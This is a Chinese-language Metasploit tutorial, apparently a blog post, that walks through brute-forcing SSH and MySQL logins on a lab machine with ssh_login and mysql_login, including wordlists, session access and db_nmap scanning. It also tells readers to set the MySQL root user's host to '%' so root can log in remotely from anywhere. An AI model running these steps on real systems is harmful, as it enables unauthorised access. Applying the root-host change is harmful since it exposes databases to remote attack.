msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法

3.ssh_login攻击（ssh_login模块的使用）

3.1搜索ssh_login模块

  search ssh_login
  搜索模块

3.2进入并使用模块

 use 0（这里0表示前面的编号）

3.3查看需要设置的参数

 show options

yes表示必要设置的参数

no表示可以设置也可以不用设置的参数

3.4 设置RHOSTS参数

 set RHOSTS 192.168.251.139

3.5设置用户名密码的字典

  cd /opt
  ls
  mkdir dict
  ls
  cd /dict
  vim username.txt
  vim password.txt

3.6设置USER_fILE和 pass_fILE参数

  set uSER_fILE /opt/dict/username.txt
  set pass_fILE /opt/dict/password.txt
  这里不区分大小写

我这里仅仅只使用了username.txt，修改一下

3.7 run启动命令

 run

3.8 sessions查看启动成功后创建的session

 sessions

3.9 进入靶机

 sessions -i 1(1表示前面的id)

3.10进入靶机成功后尝试敲一些基础命令验证石佛偶进入靶机

 pwd
 whoami
 exit

表示进入靶机成功

4.mysql_login攻击（mysql_login模块的使用）

4.1 db_nmap -sP 192.168.251.0/24的用法

  db_nmap -sP 192.168.251.0/24
  将查询到的结果存入到数据库中

4.2 IP地址查询

 hosts
 地址查询

4.3 查询地址开放的端口号

  db_nmap -sS 192.168.251.139（IP地址）
 查询地址开放的端口号并将其写入到数据库中

4.4 将C段结果放入到数据库中

  db_nmap -Pn -sV 192.168.251.139

但是这里出现了报错，经过一系列排查后发现是数据库的原因，是由于数据库没有打开，按照上面开启数据库的办法将数据库打开就ok了

重新运行

出现这个表明运行成功

4.5 使用services查看IP地址所开放的端口

 services

4.6 查询mysql_login 模块

  search mysql_login

4.7 使用模块

 use 0

4.8 show options查询可以修改的参数

 show options

4.9设置密码

 set password 123456789

4.10 设置靶机IP地址

 set rhosts 192.168.251.1

4.11 run运行

 run

这里没有运行成功

排查问题后发现是数据库不能远程连接，为什么连接不上呢？

原因：

（1） MySQL建用户的时候会指定一个host，默认是127.0.0.1/localhost只能本机访问；

（2） 其它机器用这个用户帐号访问会提示没有权限

4.12 解决办法

4.12.1 进入MySQL数据库

 mysql -u root -p
 Enter password:输入你的密码

4.12.2 进入mysql库

 use mysql

4.12.3 查看用户

 select host,user from user;

4.12.4 修改host

修改host原因： %为任意用户都有权限连接，localhost为只能本机连接，配置完host为%这一步就已经能外网访问了

  update user set host='%' where user='root';

4.12.5 修改成功后重新查看数据库信息

 select host,user from user;

修改成功

4.13 再次run运行

 run

4.14 查看数据库里面收集的信息

 creds

这里查询到了我们刚刚对数据库的操作